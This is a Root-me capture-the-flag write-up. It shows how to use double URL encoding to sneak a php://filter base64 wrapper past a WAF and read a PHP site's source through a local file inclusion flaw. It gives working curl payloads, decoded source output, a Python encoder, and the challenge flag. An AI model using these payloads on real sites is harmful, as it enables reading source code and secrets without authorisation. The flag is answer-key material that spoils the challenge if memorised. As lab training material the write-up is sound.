Root-me.org

Local File Inclusion - Double Encoding

Include can be dangerous.

We got another LFI challenge. This time the hint tells us that “include” can be dangerous and that we need to find the password in the source files of the website.

The OWASP page on double encoding gives a good explanation of how and why the technique works.

https://www.owasp.org/index.php/Double_Encoding

So we need to get hold of the source files. We know from a previous challenge that we can read a file's source through the php://filter wrapper with convert.base64-encode: include() accepts stream wrappers, and the base64 filter returns the PHP source as text instead of executing it.

So we'll use that to request the files. When we click on the challenge we're brought to this page.

http://challenge01.root-me.org/web-serveur/ch45/

If we click on Home, a page parameter gets appended to the URL.

http://challenge01.root-me.org/web-serveur/ch45/index.php?page=home

We can use that URL to request the home page via the php filter. We'll use double encoding to get the payload past the WAF.

Double encoding works when the filter decodes the input once and something downstream decodes it a second time. To send a /, we send %252F: %25 decodes to a literal %, and 2F is the hex value of /. After the first decode the WAF sees %2F, which is not a slash, so it lets the request through; after the second decode the application gets the / that we need. The same trick covers the other characters the filter cares about, : becomes %253A and . becomes %252E.
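As an added illustration (not code from this writeup or from the challenge), the following Python models a WAF that decodes the page parameter once next to an application that decodes it twice, and shows why the single-encoded payload is blocked while the double-encoded one reaches the include intact. The blocked strings, the second urldecode() and the function names are assumptions about how such a setup behaves, not observations of the Root-me server. The encoder reproduces byte for byte the double-encoded payload used in the curl request that follows.

```python
import urllib.parse
from typing import Optional, Tuple

# Added example. The WAF and application below are hypothetical models of the
# standard double-encoding scenario, not the challenge's real code.

PAYLOAD = "php://filter/convert.base64-encode/resource=home"


def encode_once(payload: str, chars: str = ":/.") -> str:
    """Percent-encode the characters a filter is likely to block (: / .),
    leaving everything else, including '=', untouched."""
    return "".join(f"%{ord(c):02X}" if c in chars else c for c in payload)


def encode_twice(payload: str, chars: str = ":/.") -> str:
    """Double-encode: encode once, then turn every '%' into %25 so that a
    single decoding pass only reveals the single-encoded form."""
    return encode_once(payload, chars).replace("%", "%25")


def naive_waf_allows(raw_query: str) -> bool:
    """Hypothetical WAF: decodes the parameter exactly once and rejects
    wrapper schemes and traversal sequences visible after that one pass."""
    seen = urllib.parse.unquote(raw_query).lower()
    return not any(bad in seen for bad in ("php://", "../", "/etc/"))


def app_page_value(raw_query: str) -> str:
    """Hypothetical application: the web server decodes once into $_GET,
    then the script calls urldecode() again before include()."""
    return urllib.parse.unquote(urllib.parse.unquote(raw_query))


def attempt(raw_query: str) -> Tuple[bool, Optional[str]]:
    """Run one request through the WAF and, if allowed, the app's decoding.
    Returns (allowed, value handed to include) with value None when blocked."""
    if not naive_waf_allows(raw_query):
        return False, None
    return True, app_page_value(raw_query)


if __name__ == "__main__":
    for label, q in (("single", encode_once(PAYLOAD)),
                     ("double", encode_twice(PAYLOAD))):
        allowed, value = attempt(q)
        print(f"{label:6} page={q}")
        print(f"       waf={'pass' if allowed else 'BLOCK'} include={value}")
```

If the backend only decoded once, the include would receive the literal string php%3A%2F%2Ffilter..., which is not a valid wrapper, so the technique tells you something about the target: a successful read means some component decodes the parameter a second time.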

curl 'http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php%253A%252F%252Ffilter%252Fconvert%252Ebase64-encode%252Fresource=home'

PD9waHAgaW5jbHVkZSgiY29uZi5pbmMucGhwIik7ID8+CjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KICA8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDx0aXRsZT5KLiBTbWl0aCAtIEhvbWU8L3RpdGxlPgogIDwvaGVhZD4KICA8Ym9keT4KICAgIDw/PSAkY29uZlsnZ2xvYmFsX3N0eWxlJ10gPz4KICAgIDxuYXY+CiAgICAgIDxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWhvbWUiIGNsYXNzPSJhY3RpdmUiPkhvbWU8L2E+CiAgICAgIDxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWN2Ij5DVjwvYT4KICAgICAgPGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9Y29udGFjdCI+Q29udGFjdDwvYT4KICAgIDwvbmF2PgogICAgPGRpdiBpZD0ibWFpbiI+CiAgICAgIDw/PSAkY29uZlsnaG9tZSddID8+CiAgICA8L2Rpdj4KICA8L2JvZHk+CjwvaHRtbD4K

We get the page source back as base64, so let's decode it.

curl 'http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php%253A%252F%252Ffilter%252Fconvert%252Ebase64-encode%252Fresource=home' | base64 -d

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   572    0   572    0     0   2353      0 --:--:-- --:--:-- --:--:--  2363

<?php include("conf.inc.php"); ?>
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>J. Smith - Home</title>
  </head>
  <body>
    <?= $conf['global_style'] ?>
    <nav>
      <a href="index.php?page=home" class="active">Home</a>
      <a href="index.php?page=cv">CV</a>
      <a href="index.php?page=contact">Contact</a>
    </nav>
    <div id="main">
      <?= $conf['home'] ?>
    </div>
  </body>
</html>

At the top of the file there is an include of conf.inc.php. The challenge hint says that includes are dangerous, so let's fetch that file and decode it. The application evidently appends .inc.php to the page parameter, which is why requesting resource=conf returns conf.inc.php.

curl 'http://challenge01.root-me.org/web-serveur/ch45/index.php?page=php%253A%252F%252Ffilter%252Fconvert%252Ebase64-encode%252Fresource=conf' | base64 -d
 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2056    0  2056    0     0  11135      0 --:--:-- --:--:-- --:--:-- 11173

<?php
  $conf = [
    "flag"        => "Th1sIsTh3Fl4g!",
    "home"        => '<h2>Welcome</h2>
    <div>Welcome on my personal website !</div>',
    "cv"          => [
      "gender"      => true,
      "birth"       => 441759600,
      "jobs"        => [
        [
          "title"     => "Coffee developer @Megaupload",
          "date"      => "01/2010"
        ],
        [
          "title"     => "Bed tester @YourMom's",
          "date"      => "03/2011"
        ],
        [
          "title"     => "Beer drinker @NearestBar",
          "date"      => "10/2014"
        ]
      ]
    ],
    "contact"       => [
      "firstname"     => "John",
      "lastname"      => "Smith",
      "phone"         => "01 33 71 00 01",
      "mail"          => "[email protected]"
    ],
...

I didn't include the whole file because the end is not necessary. The flag is clearly visible at the top of the file. So there it is.